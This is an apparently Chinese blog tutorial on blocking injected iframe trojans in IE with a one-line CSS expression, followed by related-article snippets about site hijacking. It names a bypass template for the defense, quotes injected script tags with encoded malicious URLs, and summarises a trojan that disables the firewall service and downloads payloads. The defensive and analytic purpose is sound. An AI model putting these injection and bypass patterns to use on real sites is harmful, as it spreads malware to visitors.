一行代码解决网站防挂IFRAME木马方案,小鸽子序列(灵儿)

最近公司和好朋友的网站纷纷被IFRAME了,有的挂上了鸽子,有的疯狂地弹窗,有的给人家增加流量。一个个文件去查找替换那些IFRAME代码,刚松口气,不久又加上去了,哎,什么世道!于是他们向我这个"JS高手"(他们强加给我的)求救,我也不能等闲视之,只好击键杀杀杀了。
  
  因为FF(Firefox)不怕IFRAME,于是就拿IE开刀,不知道比尔有没有奖发。我只写了一句代码,就搞定了,哈,痛快。就是IE only(特有的)的CSS中的属性expression,插进去试试,果然那些IFRAME不起作用了。

代码如下:

<style type="text/css" media="all" id="http://nihaoku.cn">
/*<![CDATA[*/
iframe{
       v:expression(this.src='about:blank',this.outerHTML='');/*使用IE Only 的样式会除所有 IFRAME */
}
#f126{v:expression() !important} //如果要使自己的IFRAME可以执行,在自己的IFRAME里加上ID="f126";
/*]]>*/
</style>

分析:
前缀:expression(表达式);

  这个前缀是可以随意更换的,我上面取名为"v",例如我可以换成:abc123:expression(this.src='about:blank',this.outerHTML=''); 挂木马的家伙得先看你的CSS里这个前缀,然后挂马的时候写成这样<iframe style="abc123:expression() !important" src="URL"></iframe>,那个前缀一定要是和你的网站一样的(abc123),才能挂到马,哈哈哈!如果把前缀做成动态的,就非常OK了,看你怎么挂!

优点:

可以解决一些站长的烦恼,无须去理会人家插了多少IFRAME木马,那些IFRAME都不起作用;

保护了访客的安全,这些IFRAME不执行,不下载,就不会破坏到访问的电脑;

代码简单,仅一句CSS样式,不管你是ASP,ASP.NET,JSP,PHP还是RUBY,都通用;

缺点:

只适合防御目前的挂IFRAME方案;

使得人家挂马的方式要改变了,挂马者可以构造这样的代码<iframe style="v:expression() !important" src="URL"></iframe>使我的防御方式失效,不过挂马都一定得看我的CSS里expression前面的这个"v"字母,我可以换成任意的如:xgz:expression(...),哈哈哈,他也拿我没办法,再如,如果我这个前缀是变化的,是不是也行吖 *_*

不能防御其他标记的马,如<script>、<applet>、<object>等。
到那时候再来找我吧,呵呵~ 网页里插入的IFRAME还是存在,只是不起作用了;

  
  代码拿出来分享一下吧!详细请进:http://www.nihaoku.cn/temp/noiframe.html

  不过我这个方法不是最终的解决案,最终的解决方案是找出真正被挂IFRAME的原因,堵住源头。这可不是我的事,呵~

(0)

相关推荐

  • 一行代码解决网站防挂IFRAME木马方案,小鸽子序列(灵儿)

    最近公司和好朋友的网站纷纷被IFRAME了,有的挂上了鸽子,有的疯狂地弹窗,有的给人家增加流量.一个个文件去查找替换那些IFRAME代码,刚松口气,不久又加上去了,哎,什么世道!于是他们向我这个"JS高手"(他们强加给我的)求救,我也不能等闲视之,只好击键杀杀杀了. 因为FF(Firefox)不怕IFRAME,于是就拿IE开刀,不知道比尔有没有奖发.我只写了一句代码,就搞定了,哈,痛快.就是IE only(特有的)的CSS中的属性expression,插进去试试,果然那些IFRAME不

  • Python一行代码解决矩阵旋转的问题

    今天刷<剑指offer>的时候碰到这样一道题: 输入一个矩阵,按照从外向里以顺时针的顺序依次打印出每一个数字,例如,如果输入如下4 X 4矩阵: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 则依次打印出数字1,2,3,4,8,12,16,15,14,13,9,5,6,7,11,10. 思路:可以模拟魔方逆时针旋转的方法,一直做取出第一行的操作,例如 : 1 2 3 4 5 6 7 8 9 利用pop输出并且删除第一行后,再进行一次逆时针旋转,就变成: 6 9

  • 使用spring-cache一行代码解决缓存击穿问题

    目录 引言 正文 目前缺陷 真正方案 缓存穿透 缓存击穿 缓存雪崩 文末 引言 今天,重新回顾一下缓存击穿这个问题! 之所以写这个文章呢,因为目前网上流传的文章落地性太差(什么布隆过滤器啊,布谷过滤器啊,嗯,你们懂的),其实这类方案并不适合在项目中直接落地. 那么,我们在项目中落地代码的时候,其实只需要一个注解就能解决这些问题,并不需要搞的那么复杂. 本文有一个前提,读者必须是java栈,且是用Springboot构建自己的项目,如果是go技术栈或者python技术栈的,可能介绍的思路仅供大家参

  • Android开发一行代码解决安卓重复点击

    目录 抛出问题 第一种:弹窗等待 第二种:禁止点击 第三种:时间判断 第四种:AOP实现 封装 总结 抛出问题 “大哥,有个问题想问你!” “哎,说吧(内心戏:咋又来了...准没好事!)” “我的一个页面中有一个查询按钮,点击就会发出网络请求,等待返回结果后更新数据.” “这不挺好的嘛!有啥问题啊?” “对,我也觉得没问题,但测试不按套路出牌啊,测试那边的网络不太好,她点击按钮之后由于网络比较慢就快速多点击了几下,然后...” “然后怎么了?ANR了吧?” “你咋知道的大哥?” “来吧,帮您看看

  • 用expression的一行代码解决iframe挂马的问题

    (包含服务器端注入.客户端ARP注入等)IE Only--一般只有IE害怕iframe这样的挂马,所以灵儿就拿IE开刀. 在阅读本文之前,我们先了解一下expression: IE5及其以后版本支持在CSS中使用expression,用来把CSS属性和JavaScript脚本关联起来,这里的CSS属性可以是元素固有的属性,也可以是自定义属性.就是说CSS属性后面可以是一段JavaScript表达式,CSS属性的值等于Javascript表达式执行的结果.在表达式中可以直接引用元素自身的属性和方法

  • 一行代码解决 perl输入 排序 输出问题

    先来看基本的方法: 复制代码 代码如下: chomp(@strings=<STDIN>);  @strings=sort @strings;  print "@strings\n."; 上面的三行代码解决的是输入,然后排序,最后将排序后的结果输出的作用. 只用一行代码即完成的写法: 复制代码 代码如下: print sort<STDIN>; 得到相同的结果,相当给力哦.

  • 解读网站被挂其中木马分析js+eval实现

    在FF看到这消息.. 于是就把网页解开了.. 原来是"老朋友"刺客集团 .. 已经多次和这个集团生成的网马打交道了.. 其中挂上一个木马 hxxp://www.es86.com/pic/ddb/2006692151148920.gif 就此做个分析吧.. 运行样本. 释放文件 C:\win30.exe 调用cmd 运行命令 /c net stop sharedaccess 访问网站 61.129.102.79 地址应该是:hxxp://www.es86.com 80端口通讯 下载:hx

  • 二行代码解决全部网页木马

    前不久一行代码解决iframe挂马(包含服务器端注入.客户端ARP注入等)>得到了很多朋友的认可,这确实是个避避风雨的好办法.可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了--页面的顶部或底部加上了: 注意,以下地址含有木马,请不要轻易访问: <script src=http://%76%63%63%64%2E%63%6E></script> <script src=http://%76%63%63%

  • Python一行代码可直接使用最全盘点

    目录 1. If-Else 三元操作符(ternary operator) 2. 交换(swap)两个变量值 3. 匿名函数(Lambda)过滤列表 4. 模拟丢硬币(Simulate Coin Toss) 5. 读取文件内容到一个列表 6. 最简洁的斐波那契数列实现 7. 字符串转换成字节 8. 反转(Reverse)一个列表 9. 列表推导式(List comprehension) 10. print语句将字符串写入文件 11. 合并两个字典 12. 按字典中的value值进行排序 Writ

  • php网站被挂木马后的修复方法总结

    本文实例总结了php网站被挂木马后的修复方法.分享给大家供大家参考.具体方法如下: 在linux中我们可以使用命令来搜查木马文件,到代码安装目录执行下面命令 复制代码 代码如下: find ./ -iname "*.php" | xargs grep -H -n "eval(base64_decode" 搜出来接近100条结果,这个结果列表很重要,木马都在里面,要一个一个文件打开验证是否是木马,如果是,马上删除掉 最后找到10个木马文件,存放在各种目录,都是php

随机推荐